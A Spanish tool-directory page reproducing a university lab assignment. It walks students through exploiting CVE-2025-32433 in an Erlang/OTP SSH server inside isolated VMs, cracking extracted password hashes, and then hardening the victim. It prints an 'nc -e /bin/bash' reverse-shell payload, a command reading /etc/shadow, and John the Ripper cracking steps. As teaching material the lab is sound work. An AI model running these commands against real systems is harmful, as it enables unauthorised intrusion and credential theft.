Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — Este proyecto simula un escenario real de ataque y defensa en dos máquinas virtuales. Explotarás una vulnerabilidad crítica de RCE previa a la autenticación (CVE-2025-32433) en un servidor SSH de Erlang/OTP, descifrarás los hashes de contraseñas extraídos y luego fortalecerás la máquina víctima con reglas de firewall y parches. | Kitploit
Herramientas/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este proyecto simula un escenario real de ataque y defensa en dos máquinas virtuales. Explotarás una vulnerabilidad crítica de RCE previa a la autenticación (CVE-2025-32433) en un servidor SSH de Erlang/OTP, descifrarás los hashes de contraseñas extraídos y luego fortalecerás la máquina víctima con reglas de firewall y parches.

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Ver Repositorio
5hace 2 mesesAún no revisado
Compartir

Fundamentos de Seguridad de la Información — Proyecto Primavera 2026

Puntos Totales: 20 | Fecha Límite: No se aceptan entregas tardías

Resumen

Este proyecto simula un escenario real de ataque y defensa en dos máquinas virtuales. Explotarás una vulnerabilidad crítica de RCE antes de la autenticación (CVE-2025-32433) en un servidor SSH Erlang/OTP, descifrarás hashes de contraseñas extraídos y luego fortalecerás la máquina víctima con reglas de firewall y parches.

RolSO
AtacanteKali Linux
VíctimaUbuntu/Debian (Erlang/OTP SSH v27.3.2)

Archivos

ArchivoDescripción
Debian-1.ovaImagen de VM víctima preconstruida — descárgala por separado, consulta Recursos (demasiado grande para GitHub)
rockyou_txt.txtLista de palabras utilizada con John the Ripper para descifrar el hash de contraseña extraído

Recursos

  • VM víctima (Debian-1.ova): Enlace de descarga — demasiado grande (~3 GB) para alojar en GitHub. Descárgala por separado e impórtala en VirtualBox/VMware como se describe a continuación.
  • Lista de palabras (rockyou_txt.txt): incluida en este repositorio, utilizada para el paso de descifrado de contraseñas en la Parte 2.

Configuración

  1. Importar las MV — Carga Debian-1.ova y tu MV de Kali Linux en VirtualBox/VMware.
  2. Red — Configura ambas MV en Adaptador Solo-Anfitrión para que puedan comunicarse de forma privada.
  3. IP de la víctima — Inicia la víctima y ejecuta ifconfig para encontrar su IP (normalmente en 192.168.56.0/24).

Parte 1 — Despliegue y Explotación del Servidor SSH Vulnerable (10 pts)

Reconocimiento

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Documenta los puertos abiertos, las versiones de servicios y las firmas de Erlang.

Explotar CVE-2025-32433 (RCE sin autenticación)

Cambia temporalmente Kali a NAT para clonar el repositorio, luego vuelve a Solo-Anfitrión.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Edita el script — establece HOST = "<victim-IP>" y actualiza el payload:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminal 1 (Kali) — inicia el listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 (Kali) — lanza el exploit:

root@kitploit:~
python3 CVE-2025-32433.py

En la shell inversa, ejecuta whoami y hostname para confirmar el acceso.


Parte 2 — Post-Explotación y Descifrado de Contraseñas (5 pts)

Extraer y Descifrar el Hash

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

Documenta el formato del hash (ej., $6$ = SHA-512), el tiempo empleado y la contraseña en texto plano recuperada.

Encontrar la Bandera

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

Parte 3 — Controles y Remediación (5 pts)

Bloquear el Vector de Ataque (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Vuelve a ejecutar el escaneo de Nmap y el exploit desde Kali — documenta que el puerto 2222 ahora aparece como "Filtered" y el exploit falla.

Parchear la Vulnerabilidad

Documenta los pasos para actualizar Erlang/OTP a v27.3.3 o posterior, que contiene la corrección para CVE-2025-32433.


Entregables

  • Informe completo con capturas de pantalla de: escaneo, ejecución del exploit, shell inversa (whoami/hostname), captura de bandera
  • Documentación del firewall antes/después (resultados de Nmap que muestren el cambio de estado del puerto)
  • Reflexión escrita explicando por qué los RCE sin autenticación son significativamente más peligrosos que los exploits posteriores a la autenticación

Referencia CVE

CVE-2025-32433 — Ejecución remota de código crítica sin autenticación en el servidor SSH Erlang/OTP. Explotable enviando paquetes SSH malformados antes de cualquier intercambio de credenciales, otorgando a un atacante no autenticado acceso completo a una shell.

Descargar herramienta